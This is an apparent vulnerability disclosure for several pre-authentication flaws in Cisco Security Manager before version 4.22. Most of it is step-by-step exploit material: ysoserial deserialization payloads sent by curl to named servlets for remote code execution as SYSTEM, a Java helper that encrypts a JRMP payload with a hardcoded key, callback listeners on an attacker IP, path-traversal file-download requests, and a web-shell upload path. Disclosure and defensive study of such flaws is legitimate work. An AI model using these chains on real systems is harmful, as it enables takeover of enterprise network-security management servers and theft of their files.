Cisco Security Manage CVE-2020-27131等多个漏洞

# TLDR > Cisco Security Manager is an enterprise-class security management > application that provides insight into and control of Cisco security and > network devices. Cisco Security Manager offers comprehensive security > management (configuration and event management) across a wide range of Cisco > security appliances, including Cisco ASA Adaptive Security Appliances, Cisco > IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), > Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and > many more. Cisco Security Manager allows you to manage networks of all sizes > efficiently-from small networks to large networks consisting of hundreds of > devices. Several **pre-auth vulnerabilities** were submitted to Cisco on 2020-07-13 and (according to Cisco) **patched in version 4.22** on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of **NT AUTHORITY\SYSTEM**. Requirement: Download _commons-beanutils-1.6.1.jar_ from central maven repository. # Remote Code Execution SecretService.jsp :-) `java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT- all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils` `curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp` # Remote Code Execution CsJaasServiceServlet Compile JaasEncryptor.java and replace the _b64Payload_ content: ​ import java.security.InvalidKeyException; import java.util.Base64; import com.cisco.nm.cmf.security.jaas.BlobCrypt; public class JaasEncryptor { public static void main(String args[]) { String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4"; byte[] payload = Base64.getDecoder().decode(b64Payload); byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5}; byte[] enc = BlobCrypt.encryptArray(payload, key); System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc)); byte[] dec = BlobCrypt.decryptArray(enc, key); } } Prepare JRMP Listener: `java -cp [YOUR_PATH]/commons- beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443` `java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0` Compile encrypted payload: `javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor` Send payload to Servlet with parameters _cmd=data_ \+ new line + _data=[ENCRYPTED_PAYLOAD]_. # Remote Code Execution AuthTokenServlet Prepare JRMP Listener: `java -cp [YOUR_PATH]/commons- beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"` `java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2` Send request: `curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet` # Remote Code Execution ClientServicesServlet Prepare JRMP listener: `java -cp [YOUR_PATH]/commons- beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"` `java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3` Send request: `curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet` # Remote Code Execution CTMServlet `java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT- all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2` `curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB- INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User- Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'` # Arbitrary File Download XdmConfigRequestHandler `GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]` # Arbitrary File Download XdmResourceRequestHandler `GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta` # Arbitrary File Upload XmpFileUploadServlet Write a web shell e.g. `POST /cwhp/XmpFileUploadServlet?maxFileSize=100` Normal multi-part e.g. writing web shell in _filename_ with _../../MDC/tomcat/webapps/cwhp/testme.jsp_. # Arbitrary File Download XmpFileDownloadServlet `GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1` This will respond with a ZIP file containing all files from the directory. # Arbitrary File Download SampleFileDownloadServlet `GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]` This will respond with a ZIP file containing all files from the directory. # Arbitrary File Download resultsFrame.jsp `GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]` # Remote Code Execution SecretServiceServlet See also <https://de.tenable.com/security/research/tra-2017-23> `java -cp [YOUR_PATH]/commons- beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"` `java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2` `curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet`